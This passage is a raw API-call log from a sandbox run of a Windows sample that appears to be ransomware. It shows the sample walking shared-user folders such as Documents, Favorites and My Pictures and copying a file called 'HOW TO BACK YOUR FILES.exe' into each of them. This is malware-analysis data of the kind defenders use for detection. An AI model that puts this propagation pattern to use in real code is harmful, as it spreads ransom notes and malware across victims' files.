lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.682] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0" [0090.682] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.682] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0090.682] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0") returned 84 [0090.682] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0" [0090.682] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.682] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\assistance\\client\\1.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.683] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.683] GetLastError () returned 0x0 [0090.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.683] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.683] CloseHandle (hObject=0x120) returned 1 [0090.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.683] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.683] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.684] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0090.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0090.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0090.684] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned 90 [0090.684] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0090.684] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.684] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\assistance\\client\\1.0\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.684] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.684] GetLastError () returned 0x0 [0090.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.685] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.685] CloseHandle (hObject=0x120) returned 1 [0090.685] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.685] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.685] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x67156600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67156600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.685] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Favorites", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Favorites") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Favorites" [0090.685] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0090.685] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0090.685] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Favorites") returned 62 [0090.685] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Favorites" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Favorites") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Favorites" [0090.685] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.685] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Favorites\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\favorites\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.686] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.686] GetLastError () returned 0x0 [0090.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.686] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.686] CloseHandle (hObject=0x120) returned 1 [0090.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.686] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.686] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Favorites\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498632e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.686] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents" [0090.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0090.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0090.686] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Documents") returned 62 [0090.686] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents" [0090.687] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.687] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\documents\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.687] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.687] GetLastError () returned 0x0 [0090.687] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.687] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.687] CloseHandle (hObject=0x120) returned 1 [0090.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.687] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.688] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53342a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53342a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.688] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos" [0090.688] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0090.688] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0090.688] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos") returned 72 [0090.688] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos" [0090.688] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.688] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\documents\\my videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.689] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.689] GetLastError () returned 0x0 [0090.689] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.689] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.689] CloseHandle (hObject=0x120) returned 1 [0090.689] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.689] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.689] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.689] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\Sample Videos", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\Sample Videos") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\Sample Videos" [0090.689] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.689] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0090.689] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\Sample Videos") returned 86 [0090.689] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\Sample Videos" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\Sample Videos") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\Sample Videos" [0090.689] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.689] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\Sample Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\documents\\my videos\\sample videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.690] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.690] GetLastError () returned 0x0 [0090.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.690] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.690] CloseHandle (hObject=0x120) returned 1 [0090.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.690] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.690] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Videos\\Sample Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.691] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures" [0090.691] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0090.691] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0090.691] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures") returned 74 [0090.691] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures" [0090.691] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.691] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\documents\\my pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.691] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.692] GetLastError () returned 0x0 [0090.692] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.692] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.692] CloseHandle (hObject=0x120) returned 1 [0090.692] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.692] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.692] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b96a420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b96a420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.692] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\Sample Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\Sample Pictures" [0090.692] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0090.692] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0090.692] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\Sample Pictures") returned 90 [0090.692] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\Sample Pictures" [0090.692] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.692] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\Sample Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\documents\\my pictures\\sample pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.693] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.693] GetLastError () returned 0x0 [0090.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.693] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.693] CloseHandle (hObject=0x120) returned 1 [0090.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.693] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.693] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Pictures\\Sample Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.694] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music" [0090.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321060 | out: hHeap=0x2b0000) returned 1 [0090.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0090.694] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music") returned 71 [0090.694] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music" [0090.694] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.694] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Documents\\My Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\documents\\my music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.694] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, 